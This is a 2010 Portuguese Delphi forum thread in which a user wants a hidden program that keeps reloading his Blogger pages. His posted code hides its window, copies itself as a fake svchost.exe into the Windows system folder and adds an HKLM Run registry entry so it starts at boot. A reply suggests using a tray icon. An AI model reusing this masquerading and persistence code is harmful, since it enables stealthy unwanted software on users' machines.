brunowbcr Postado Junho 24, 2010 Denunciar Share Postado Junho 24, 2010 galera to querendo fazer um navegador ocultotipo quele se conecta ao meu site oculto sem aparecer nada talvez no processose que fique atualizado de 10 e 10 minutos a paginaeu usei o componente webbrowser mas ele dava um erro de script então eu concertei issoele funciona direitinho mas não conecta o site quando eu oculto o formtem outro componente que posso usar ? ou talvez posso concerta meu codigo ?unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, OleCtrls, SHDocVw, ExtCtrls, Registry; type TForm1 = class(TForm) Timer1: TTimer; web: TWebBrowser; Timer2: TTimer; Timer3: TTimer; procedure Timer1Timer(Sender: TObject); procedure Timer2Timer(Sender: TObject); procedure Timer3Timer(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} procedure TForm1.Timer1Timer(Sender: TObject); begin timer2.Enabled := true; end; procedure TForm1.Timer2Timer(Sender: TObject); begin web.Navigate('http://aprendacomprazer.blogspot.com/search/label/Celular'); timer2.Enabled := false; timer3.Enabled := true; timer1.Enabled := false; end; procedure TForm1.Timer3Timer(Sender: TObject); begin web.Navigate('http://aprendacomprazer.blogspot.com/search/label/Animes'); timer3.Enabled := false; timer1.Enabled := true; end; procedure TForm1.FormCreate(Sender: TObject); type TRegisterServiceProcess = function (dwProcessID, dwType:DWord) : DWORD; stdcall; var reg:TRegIniFile; s,a : string; DiretorioWindows : String; DiretorioTemp : String; begin application.ShowMainForm:= false; a := Application.ExeName; CopyFile(Pchar(a), Pchar('C:\Windows\system\svchost.exe'),false); s:= 'C:\Windows\System\svchost.exe'; Reg:=TRegIniFile.Create('full'); reg.RootKey:=HKEY_LOCAL_MACHINE; reg.Openkey ('\Software\Microsoft\Windows\CurrentVersion',false); reg.WriteString('Run', 'svchost', s); end; end.lembrando que no webrowser ta ativa a opção silent para não da erro de script no meu blogger Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Douglas Soares Postado Junho 28, 2010 Denunciar Share Postado Junho 28, 2010 ao invez de deixar oculto o form, você pode optar por usar um componente de trayIcon, assim o seu aplicativo fica aparecendo na bandeja do windows... Você pode encontrar alguns exemplo aqui: http://www.planetadelphi.com.br/busca/trayiconAbraços Citar Link para o comentário Compartilhar em outros sites More sharing options...
Pergunta
brunowbcr
galera to querendo fazer um navegador oculto
tipo quele se conecta ao meu site oculto sem aparecer nada talvez no processos
e que fique atualizado de 10 e 10 minutos a pagina
eu usei o componente webbrowser mas ele dava um erro de script então eu concertei isso
ele funciona direitinho mas não conecta o site quando eu oculto o form
tem outro componente que posso usar ? ou talvez posso concerta meu codigo ?
lembrando que no webrowser ta ativa a opção silent
para não da erro de script no meu blogger
Link para o comentário
Compartilhar em outros sites
1 resposta a esta questão
Posts Recomendados
Participe da discussão
Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.